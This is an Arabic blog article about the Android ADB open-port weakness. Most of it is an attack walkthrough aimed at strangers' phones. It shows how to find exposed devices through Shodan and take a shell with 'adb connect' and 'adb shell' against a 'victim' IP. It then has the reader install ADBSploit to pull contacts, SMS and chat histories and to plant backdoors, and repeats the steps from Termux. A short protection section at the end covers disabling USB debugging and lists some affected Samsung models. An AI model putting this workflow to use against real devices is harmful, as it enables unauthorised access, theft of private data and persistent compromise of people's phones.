ثغرة adb

ثغرة adb

صالح صبري
2021-05-08T22:07:43+04:00
مقالات
صالح صبري19 فبراير 202155 مشاهدةآخر تحديث : منذ شهر واحد

ثغرة adb تجعل من هاتفك ضحية سهلة في أيدي المخترقين، باستخدام أدوات مثل: أداة adb shell  وأداة ADBSploit من نظام كالي لينكس أو حتى من التيرمكس يمكن استغلال ثغرة adb، لكن هل يوجد شيء للحماية من ثغرة adb؟

ما هي ثغرة adb؟

هي ثغرة تصيب أجهزة الأندرويد، حيث تمكّن المخترق من الوصول الكامل إلى جهاز الضحية بشكل كامل عن طريق منفذ USB الوهمي المفتوح لمشاركة المعلومات على الشبكة، يستغل المخترقون هذه للتحكم الكامل بالضحية؛ مع ندرة وجودها في معظم الأجهزة، لكن تبقى هناك عدد غير بسيط مصاب بها، فحسب موقع shodan هناك أكثر من 5 ألف جهاز أندرويد مفعل هذه الثغرة.

كيف تعمل ثغرة adb؟

عندما يكون منفذ اليو اس بي مفعل بما يسمى “تصحيح أخطاء اليو اس بي”، يبقى بروتوكول Tcp مفتوحًا عند المنفذ 5555، هذا الشيء لأي جهاز متصل بالإنترنت الولوج من ذلك المنافذ مما يعطيه تحكم كامل بالجهاز عن طريق الاتصال بنواة لينكس (سطر الأوامر)، لكن لا بد من توصيل هذا الجهاز بمنفذ USB لكي تتفعل هذه الثغرة.


اقرأ أيضًا: ثغرة إحياء ذكرى حساب فيس بوك و كيفية الحماية منها


كيفية استغلالها

يمكن لأي شخص لديه معرفة ولو سطحية في التعامل مع سطر الأوامر لنظام لينكس يستطيع استغلال هذه الثغرة بسهولة؛ طريقة استغلال هذه الثغرة لا تختلف كثيرًا بين نظام كالي وبرنامج التيرمكس.

متطلبات هذه العملية:

  •  اتصال بالإنترنت.
  • تفعيل خاصية مشاركة الملفات عن طريق اليو إس بي (USB debug).
  • تثبيت adb على جهازك للقيام بعملية الاختراق.

الاستغلال عن طريق نظام كالي لينكس

هناك العديد من البرامج على نظام كالي لينكس، سنشرح أداة adb shell كذلك أداة Adbsploit بشيء .

أداة adb shell

تثبيت أداة adb shell

توجد حزمة جاهزة للتحميل، وهي (adb)، نستدعيها بالأمر التالي:

sudo apt-get install adb

البحث عن أجهزة مصابة بالثغرة

تستطيع الحصول على جميع عناوين الايبي المصابة بالثغرة adb عن طريق موقع شودان العالمي، تدخل على موقع Shodan مباشرة من هنا، ثم تكتب في حقل البحث عن العبارة Android Debug Bridge كما توضحه الصورة التالية:

موقع شودان لاكتشاف الأجهزة المصابة بثغرة adb
موقع شودان لعرض الأجهزة المصابة بالثغرة

ستلاحظ أن هناك أكثر من 5 ألف جهاز متصل بالإنترنت ومصاب بهذه الثغرة، كما تظهر لك جميع عناوين الايبي المتصلة والتي تستطيع استغلالها عن طريق ثغرة Adb؛ في نفس الوقت تستطيع أن تجرّب هذه الثغرة على هاتف محمول لاختبار اختراقه، فقط قم بالدخول إلى موقع iptrackonline – باستخدام الهاتف المراد اختبار اختراقه – ثم خذ عنوان الايبي الخاص به.


اقرأ أيضًا: ما هو نظام لينكس ؟


استغلال ثغرة adb

بعد جلبنا لعنوان الايبي الخاص بالضحية، وتثبيت أداة adb shell فلم يبقى لنا سوى استغلال الثغرة، للقيام بذلك نطبع اسم الأداة ثم اتصال ثم عنوان الايبي، كما في المثال التالي:

adb connect 192.168.1.5

أداة adb shell
استغلال ثغرة adb بالأداة adb shell

العنوان 192.168.1.5 في الغالب غير عنوان حقيقي، وضعته هنا فقط كمثال، وأيضا وجب التنويه إلى أن العناوين المدخلة هي عناوين ip الخارجية وليست الداخلية الموجودة في شبكة الراوتر.

حينها تظهر لك رسالة إما بأن الاتصال نجح:

connected to 192.168.1.5

بعد ذلك تكتب الأمر التالي:

adb shell

تنفيذ السكريت
تنفيذ السكريت للثغرة

هذا الأمر يقوم بتنفيذ سكربت للولوج إلى التيرمنال الخاص بالجهاز المراد اختراقه، بعد ذلك يمكنك استكشاف النظام الخاص بالضحية وحتى تثبيت البرامج وغيرها كما تشاء، أيضًا يمكنك الدخول مع صلاحيات الجذر، مما يمكنك من التحكم الكامل به.


اقرأ أيضًا: تثبيت نظام كالي لينكس من خلال فلاشة في 2020


أداة ADBSploit

عن أداة ADBSploit

تم تطوير هذه الأداة لتسهيل عملية الاقتحام للنظام عن طريق ثغرة adb، حيث تمكنك من تصوير شاشة الهاتف وتسجيلها، واستخراج جهات الاتصال والرسائل النصية، كذلك محادثات الواتساب والتيليجرام واللاين، وحتى تثبيت أبواب خلفية لكي يتسنى للمخترق الدخول مرة أخرى إلى النظام حتى مع زوال الثغرة.

بالإضافة إلى المميزات الجديدة للنسخة الأخيرة للبرمجية حيث أصبح بالإمكان إرسال واستقبال الرسائل النصية وإجبار البرامج على الإغلاق والدخول إلى وضع الريكفري… الخ.

تثبيت أداة ADBSploit

تنزيل الأداة بالفيت:

git clone https://github.com/mesquidar/adbsploit.git

ثم الدخول إلى الملف:

cd adbsploit

تثبيت ملف حزمة التثبيت:

python setup.py install

بعد ذلك التنفيذ:

adbsploit

تشغيل أداة adbsploit واستخدامها
تشغيل أداة adbsploit واستخدامها

استخدام أداة adbsploit

استخدام أداة adbsploit
استخدام أداة adbsploit
  • اطبع الأمر device لرؤية الأجهزة.
  • ثم اطبع الأمر select لاختيار الجهاز الهدف.
  • يمكنك الاتصال بالجهاز المصاب بثغرة adb عن طريق الأمر connect ثم سيطلب منك إدخال عنوان الايبي الخاص بالضحية.
  • يمكنك الاطلاع على جميع الأوامر للتحكم بالجهاز بطباعة الأمر help.

الاستغلال عن طريق نظام تيرمكس

أولًا تقوم بتثبيت نظام التيرمكس على الهاتف عن طريق تنزيله من سوق بلاي من هنا، ثم نتقوم بترقية وتحديث النظام.

من الممكن أنك لاحظت بأنه لا توجد حزمة معرّفة من قبل في التيرمكس لadb، لذا نتقوم بتحميل أداة adb shell الخاص بالتيرمكس بالأداة git عن طريق الأمر التالي:

تثبيت git ثم التنزيل بها …

pkg install git

————————

git clone https://github.com/rendiix/termux-adb-fastboot.git

تنزيل أداة adb للتيرمكس
تنزيل أداة adb للتيرمكس

بعد ذلك نقوم بالدخول إلى الملف الذي نزلناه بالأمر التالي:

cd termux-adb-fastboot

الدخول إلى ملف termux-adb-fastboot
الدخول إلى ملف termux-adb-fastboot

تستطيع في أي لحظة الاطلاع على الملفات بالأمر ls كما في الصورة التالية:

حينها تقوم بتثبيت الأداة بتنفيذ الملف install.sh

bash install.sh

سكربت تفعيل أداة adb على التيرمكس
سكربت تفعيل أداة adb على التيرمكس

ثم انتظر حتى تتثبت الأداة بشكل صحيح…

بعد التثبيت نتأكد من أن التثبيت قد تم بشكل صحيح عن طريق طباعة أمر الإصدار:

adb –verison

اختبار البرنامج بإظهار الإصدار له

بعد ذلك تستطيع استخدام الأداة عن طريق كتابة connect ثم عنوان الايبي للضحية

adb connect 192.168.1.5

بعد ذلك أمر الشيل:

adb shell

بعدها مباشرةً ينقلك إلى سطر الأوامر الخاص بجهاز الضحية، تستطيع استكشاف الملفات مثل بطاقة الذاكرة مثلًا (sdcrad).


اقرأ أيضًا: كيف تحترف لينكس


الحماية من ثغرة adb

هذه هي أهم نقطة في موضوعنا، وهي تجنب الوقوع في هذه التغرة بقدر الإمكان، وهذا الأمر يتحقق بعدد من الخطوات وهي كالتالي:

خطوات الحماية من ثغرة adb

التأكد من عدم تفعيل خاصية النقل بواسطة الUSB أو حتى عدم تشغيلها أبدا، وذلك عن طريق إلغاء تفعيل خيارات المطور والتي تمتلك خاصية تصحيح الأخطاء.

كيفية إلغاء تفعيل خيارات المطور
الحماية من ثغرة adb

أو في الإعدادات ثم الشبكة ثم الربط، ثم التأكد من إلغاء تفعيل “اتصال USB”.

كيف أحمي نفسي من adb
كيف أحمي نفسي من adb

في حالة لم تستطع ذلك أو لم تجده في حال من الأحوال، تستطيع تحميل إحدى مكافحات الفايروسات مثل AVG  أو Avast.
تستطيع أيضًا القيام بخطوة أخرى إضافية وهي فحص ما إذا كان جهازك من الأجهزة المحتمل إصابتها بالثغرة.

قائمة الأجهزة المصابة بالثغرة

هناك عدد من الأجهزة والتي تم العثور على هذه الثغرة فيها، منها ما تم التأكيد على إصابته بالثغرة مثل الإصدارات التالية من أجهزة سامسونج:

  • GT-I5500
  • GT-S5839i

أما بالنسبة للأجهزة التي يحتمل إصابتها فهي:

  • GT-I9100
  • GT-S5830
  • S7560M
  • GT-S7500

قد تكون هذه الثغرة نادرة الاستغلال، لكن يفضل عليك قطع الاتصال بالإنترنت في حالة أنك قمت بتوصيل يو إس بي للإنترنت، لأن عنوانك سيظهر ضمن نطاق بحث موقع شودان.

موقع السوق

اترك تعليق

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *


شروط التعليق :

عدم الإساءة للكاتب أو للأشخاص أو للمقدسات أو مهاجمة الأديان أو الذات الالهية. والابتعاد عن التحريض الطائفي والعنصري والشتائم.